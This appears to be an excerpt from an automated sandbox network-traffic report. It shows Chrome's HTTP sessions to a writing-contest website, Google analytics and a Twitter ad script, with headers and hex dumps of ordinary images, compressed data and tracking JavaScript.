                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
                                                                                                                                                                                            Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                            Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: b6 ae e6 1f 24 43 dd 92 73 ec 75 6f 3c 3c 93 bf 72 1b 3d bb 28 c6 75 d6 9f 74 4c 64 b6 7d 3a a1 01 67 2b 68 f4 e5 16 b8 54 98 68 58 f6 4a 39 8f cb 5c 27 36 e8 bd 55 41 1a 3b 4e d8 20 c8 93 44 96 3a 9a dd 8c e4 36 a1 5f 96 49 77 15 7d 8a b0 99 dc 3d d7 7d b8 12 71 5c 14 85 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f cb 2d 36 bb de 5f 14 bd 41 43 99 36 9a 32 b2 7d 96 4a 10 96 49 d8 33 77 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 22 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 87 c9 e0 86 37 06 e2 16 b6 1a 68 17 66 a0 f5 16 a6 d8 e0 d7 61 6f 77 50 fe d2 31 3a 86 cd e6 f3 f8 8e c7 c8 4e ea 30 e0 14 e6 e8 29 1c 16 cf a6 73 d9 69 4b cd 30 7d d4 b9 9f 60 36 0f 70 32 b0 6f 3e 49 4f 2f 67 af 16 90 59 ab ad 3b 3c 42 f2 16 fa 66 10 b8 9d b6 68 bb
                                                                                                                                                                                            Data Ascii: $Csuo<<r=(utLd}:g+hThXJ9\'6UA;N D:6_Iw}=}q\"L"#N-lp8/-6_AC62}JI3wtP<z`+}"+5ZTJ67hfaowP1:N0)siK0}`6p2o>IO/gY;<Bfh
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: eb 04 a4 26 b6 c5 64 62 66 52 c6 ee 78 a0 a6 b6 4a d8 b0 ad c3 ca 5b 30 96 b8 e1 f0 06 b5 7a ab 8f 8d 99 8a 40 2f e0 97 75 40 27 a8 9b 13 ed 46 b0 ae 9f 19 48 51 06 df 08 70 d0 10 11 4c aa 36 f5 cd 2e 1e d7 40 84 b5 00 49 08 11 6c 56 4a b8 34 a9 79 04 4e ca 0c 48 b7 4d 8b 54 0f 82 85 24 da 62 52 44 da 42 96 32 a8 12 bc 11 50 73 ed 77 90 8a dd 03 47 b4 db c2 a2 4b 91 84 03 5d 2a d6 67 4e 49 af 6e a0 4d 57 a9 28 d3 b8 0c 5d c6 d8 68 bd b9 24 d6 10 1b dd f7 e3 8a 7c 59 ff 53 78 a2 23 37 7c 2b 67 bc e7 f2 13 67 94 06 f1 d7 ee 7c 8c e1 a8 e4 a0 9a e7 3a ec ed 1c 98 35 1c 13 00 07 55 52 86 d9 7f 89 6f 64 ba 5f 4b b1 b6 81 4d 6f 57 d2 ac b9 b2 4f 76 eb ff 00 47 57 23 6a d5 e8 31 a3 c5 1f 4d 4b be ff c2 34 49 7f 4c 9c 89 ee b8 d8 22 1c db 6f 31 e6 7d ff cd d3 6d
                                                                                                                                                                                            Data Ascii: &dbfRxJ[0z@/u@'FHQpL6.@IlVJ4yNHMT$bRDB2PswGK]*gNInMW(]h$|YSx#7|+gg|:5URod_KMoWOvGW#j1MK4IL"o1}m
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 00 e1 72 d9 a2 2f 24 2b f9 5c 52 52 4f c8 e5 3f 55 df de 80 6f a2 0c 78 b2 e9 f0 3d 94 0e 4f 32 dd 5b 4b 08 4c c9 c2 7f 8e 37 7a 70 4e ab 0d 5b 4a 73 62 8b 13 38 0e 42 d6 33 78 a8 5b 81 63 3a 4a 28 78 b0 7b b0 9f 23 d2 46 98 11 35 03 50 d0 b1 2c e1 6b 03 41 0d da f0 13 23 aa 36 84 0b 93 79 a8 85 b8 d8 1d 18 c8 19 3b eb 72 95 4a 92 b9 8e 92 b1 a2 d6 40 2a 6d 0f 9d 03 70 c6 9c 02 87 b9 03 5a f3 d4 54 44 2c 45 c2 d6 ad 73 0a d0 23 09 1c c3 a6 72 5d ab 47 1b 97 ef 36 56 86 9d 88 54 4f 1a ea 40 03 eb 77 4d dd 7e 64 8c a0 aa be 69 04 31 2e 44 a0 32 ad b2 a2 f4 c7 6f d6 dc 11 c1 a8 cd 9a 8f 44 64 3a 28 75 e2 83 fd 9d 8c 5c 09 f6 86 da 52 5d 45 af 8f da c2 d7 6a dc a6 9d 44 ad ef 99 1f 00 e0 e9 38 77 49 29 15 74 0f 0e 7b 6e 79 35 6a 47 de c1 48 41 ee 91 38 00 67
                                                                                                                                                                                            Data Ascii: r/$+\RRO?Uox=O2[KL7zpN[Jsb8B3x[c:J(x{#F5P,kA#6y;rJ@*mpZTD,Es#r]G6VTO@wM~di1.D2oDd:(u\R]EjD8wI)t{ny5jGHA8g
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 3f 38 72 95 0e b2 88 01 59 ae 94 15 dd 80 68 b5 1a 7b 31 c7 00 4e 15 98 79 aa be 42 41 2e ad b8 4b 18 e0 29 5e 1c 72 32 0d 02 c6 54 3c d7 0e 82 14 2d 24 02 89 53 07 11 20 c9 35 ff a3 31 9b fc ab dd 0f c9 b5 0e db be 73 09 17 60 61 00 0a c0 b2 41 62 2e 72 d9 aa 9d 89 d6 95 d4 ff 50 a6 53 b4 1c 2e f1 42 1d 20 cb 40 e5 e6 89 a4 0d 29 31 4b 12 e6 85 89 0f 64 f2 d5 fd dd 12 4a b8 90 2a 74 10 f4 a6 d9 d6 7d 98 4c 66 7a af 48 ea 33 96 92 3d 11 11 7d 9a da de 67 7f 11 76 43 9f fd 20 a2 bb e4 ec 99 a8 d8 99 66 cd 6d d7 c5 59 d8 0d 3c 5c 96 56 b1 41 cd 9a 58 6d 64 07 9f 35 7f a8 88 63 14 ec b2 b3 9d 47 62 a5 c6 21 db 79 ec 03 f0 9d 7c b6 03 5a c1 9d ff b6 d0 0f a0 77 fc e0 6c f2 95 c2 23 a2 db 70 37 e8 fe f5 44 ca 36 48 ee 54 d8 6b 63 56 e6 51 2d 58 8b e3 62 8a 1d
                                                                                                                                                                                            Data Ascii: ?8rYh{1NyBA.K)^r2T<-$S 51s`aAb.rPS.B @)1KdJ*t}LfzH3=}gvC fmY<\VAXmd5cGb!y|Zwl#p7D6HTkcVQ-Xb
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1102INData Raw: 5b df 22 35 f0 65 76 da d6 21 b8 5e 4c 2e 2f 7b 98 24 bf 09 4f e9 af 2e b5 26 46 c0 65 c4 9a 69 01 88 e4 57 00 92 c8 1d e2 ad 7c c8 74 45 19 9e da b3 0a fa fd b4 8d 19 49 82 44 64 78 56 cf 00 a6 08 30 05 80 a5 b9 88 c8 08 cc 8e 15 bb f2 7e 53 6e 35 9a ab 49 ba de a2 75 ca db 29 21 5d 9e 68 d8 2e f8 59 10 ef 72 84 62 eb ce 15 77 e3 22 29 45 8e 39 e4 e4 07 a3 49 6f a6 8a a5 22 19 23 be a0 84 ba ba 89 c0 80 b9 1c c0 41 b6 72 92 49 81 10 5f 91 59 56 12 51 c2 a6 84 f5 4a 54 6f 84 2e d1 a0 3b 32 a1 b2 45 82 f5 60 2f 45 8b 24 27 64 c7 b3 86 20 5d 50 a4 50 d3 39 5a 57 e5 84 8f 36 47 50 18 70 12 58 55 23 86 d6 41 ba 19 54 0c 0d f2 7b 33 c3 d7 e0 d3 0f 74 a1 b4 d7 8f 15 b5 19 38 95 bc 58 98 d1 e4 df af 12 60 0c 86 4a 3c 80 42 78 da 01 2a a5 07 c7 4c 40 cb d0 8b 1e
                                                                                                                                                                                            Data Ascii: ["5ev!^L./{$O.&FeiW|tEIDdxV0~Sn5Iu)!]h.Yrbw")E9Io"#ArI_YVQJTo.;2E`/E$'d ]PP9ZW6GPpXU#AT{3t8X`J<Bx*L@


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            42192.168.2.164977266.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC875OUTGET /assets/images/logo@2x.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:41 GMT
                                                                                                                                                                                            ETag: "7263-578fd676fea40"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 29283
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 44 00 00 01 0c 08 03 00 00 00 12 dd 59 f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 68 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRDYtEXtSoftwareAdobe ImageReadyqe<hiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: bd bf 5e b1 66 77 1b 3f f4 cf 32 a5 7d 84 fc 4c a5 e2 0c a9 94 08 e4 8b 63 62 26 8e f3 20 09 a0 20 05 f0 c5 4f 10 65 12 ee 79 a4 1a f5 76 30 9f d9 55 82 ed 15 8b 54 a0 ff 14 b5 d5 8d d3 40 b1 1c a0 80 90 38 2e 46 63 46 dd e9 b6 0a 17 52 4b 60 11 6b 23 a3 f8 3a 01 77 c4 9a 69 b2 14 0e de 30 45 69 b7 ff de eb 45 fb 65 80 ef c0 d0 4a bb f5 2a 31 6f f9 67 11 df d9 bf eb e7 a9 87 d0 3f 0d 91 13 94 f0 09 95 d5 26 27 31 ba 63 00 95 75 d1 02 b2 92 ae b1 1a 77 c9 45 7e 26 3e 36 62 79 06 c9 dd 7b ce 55 36 7d 6e f4 7c 44 04 09 a0 01 fc 76 bc 4d 8d fa e5 85 55 48 25 c2 64 73 d8 db 29 24 50 21 10 c6 a9 cc 64 e7 85 1f 9e a1 ff d8 b4 c7 5d 5e 2f fa ee a5 f3 5e 8f 78 fd ed 17 5e f6 bd fa cb 47 fb 6f f6 eb b5 e7 99 27 be fe 59 42 34 3c eb ae ee e8 88 92 24 57 74 d0 68 94
                                                                                                                                                                                            Data Ascii: ^fw?2}Lcb& Oeyv0UT@8.FcFRK`k#:wi0EiEeJ*1og?&'1cuwE~&>6by{U6}n|DvMUH%ds)$P!d]^/^x^Go'YB4<$Wth
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 74 a2 d0 5d 34 58 58 5d e2 19 ac 41 3d a2 c2 fa c6 12 57 39 56 ee 51 54 54 e9 c2 82 ff 92 0a 4f 2f 42 60 09 78 62 15 ac e2 a6 72 f9 50 6a 7a b6 c0 a6 40 21 d2 73 65 3b a5 52 8d 29 de 60 b1 f1 f4 7a 9b 88 7a 40 49 ba c6 38 30 0e 28 a0 9d 02 f5 0f bc fb e7 0f b5 67 ff 2d fb d3 0e 07 68 de 65 bc c6 94 c7 0d 25 5b 1e 5e 58 74 ed 65 e9 18 b6 53 89 d1 a8 bd f7 a9 25 99 ca e3 8e 6c e7 d9 ca 29 a4 ac 16 a9 45 3c 15 42 fe 40 ff 09 1c bd b2 f1 44 2f 93 5e 59 57 53 54 72 a2 61 a8 a4 af a2 d6 53 5d e1 76 23 15 48 75 ad bb c2 e3 99 ea 29 aa a8 27 e0 b6 cf e1 93 40 80 9e c0 01 75 19 99 76 18 8a 8e a6 4b e4 49 72 21 a4 49 97 c0 6a 9b 49 63 b1 e7 a3 01 1a 35 ea 1a 77 e9 a6 28 64 02 bc d4 12 5b 74 23 42 f4 f5 f3 87 03 f9 0b 5f 3f b6 6e 9e 07 b3 67 cb 1b af 7b 35 11 fa 57
                                                                                                                                                                                            Data Ascii: t]4XX]A=W9VQTTO/B`xbrPjz@!se;R)`zz@I80(g-he%[^XteS%l)E<B@D/^YWSTraS]v#Hu)'@uvKIr!IjIc5w(d[t#B_?ng{5W
                                                                                                                                                                                            2024-11-18 20:00:08 UTC5461INData Raw: 33 5d 37 1b d6 58 76 c6 ab 6c 71 c5 6e f2 90 ba f1 67 a4 16 f2 cb 12 bb 39 f8 67 a3 23 c1 91 f9 7d 10 91 26 aa b4 f0 34 9e b7 9b 6d 41 a3 0e a9 34 75 79 af fc 8e 2d b0 d9 e9 00 5c 3b e7 f3 ce 04 2f 38 fc 7c 59 2d e4 b4 59 c0 7a ad b5 b3 ab cb e3 71 bb ad 2c 03 22 8c 3a 05 6a b7 96 cc 3e 0f 4f c0 3f a2 14 5c b1 f1 b5 46 8d d5 eb 71 d6 cb 95 b1 0f 4f 12 44 c4 22 47 e6 36 e9 40 1b 7a 55 72 4b 39 7c e3 ab f3 70 22 63 91 21 b4 7a 8e 1f c5 d6 2d 48 17 1c bd 5e bc 00 aa 2d 4f c4 9e 64 9c 32 5c 9d f2 89 1a 83 a7 08 15 3a dd a2 34 db 38 84 1b 69 aa d9 89 6b d9 20 bc ee ee a6 f6 64 1f ef 18 9a 74 0f 59 64 28 06 aa 6a 19 cc 39 da 57 0a 57 09 39 5d 90 5c 6e 32 7a 2d 90 c3 e4 f2 3a bb 9c 6a 8f 81 55 d4 c0 35 bb 93 db cb fa 57 25 18 8b 7e ff 4c 03 22 ac 5c 2e 8f 01 aa
                                                                                                                                                                                            Data Ascii: 3]7Xvlqng9g#}&4mA4uy-\;/8|Y-Yzq,":j>O?\FqOD"G6@zUrK9|p"c!z-H^-Od2\:48ik dtYd(j9WW9]\n2z-:jU5W%~L"\.


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            43192.168.2.1649761142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC967OUTPOST /ccm/collect?en=page_view&dl=https%3A%2F%2Fwinningwriters.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1996116743.1731960007&auid=325201710.1731960007&npa=0&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&tft=1731960006872&tfd=7627&apve=1 HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                            Vary: X-Origin
                                                                                                                                                                                            Vary: Referer
                                                                                                                                                                                            Server: scaffolding on HTTPServer2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Access-Control-Expose-Headers: date,vary,vary,vary,server,content-length
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            44192.168.2.1649769146.75.120.1574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC530OUTGET /uwt.js HTTP/1.1
                                                                                                                                                                                            Host: static.ads-twitter.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 58876
                                                                                                                                                                                            Last-Modified: Tue, 29 Oct 2024 01:22:31 GMT
                                                                                                                                                                                            ETag: "4328e910de583ad53b3a7a76455af005"
                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            X-Served-By: cache-iad-kiad7000145-IAD, cache-fra-etou8220151-FRA
                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                            Vary: Accept-Encoding,Host
                                                                                                                                                                                            P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                                                                            x-tw-cdn: FT
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 36 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3b 74 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d
                                                                                                                                                                                            Data Ascii: !function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 74 68 69 73 2e 77 6f 72 64 73 3d 74 7c 7c 5b 5d 2c 74 68 69 73 2e 73 69 67 42 79 74 65 73 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 34 2a 74 2e 6c 65 6e 67 74 68 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 7c 7c 66 29 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 72 2b 6f
                                                                                                                                                                                            Data Ascii: this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||f).stringify(this)},concat:function(t){var e=this.words,n=t.words,r=this.sigBytes,i=t.sigBytes;if(this.clamp(),r%4)for(var o=0;o<i;o++){var a=n[o>>>2]>>>24-o%4*8&255;e[r+o
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 70 61 72 73 65 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 29 7d 7d 2c 70 3d 63 2e 42 75 66 66 65 72 65 64 42 6c 6f 63 6b 41 6c 67 6f 72 69 74 68 6d 3d 75 2e 65 78 74 65 6e 64 28 7b 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 73 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 68 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74
                                                                                                                                                                                            Data Ascii: ion(t){return d.parse(unescape(encodeURIComponent(t)))}},p=c.BufferedBlockAlgorithm=u.extend({reset:function(){this._data=new s.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=h.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigByt
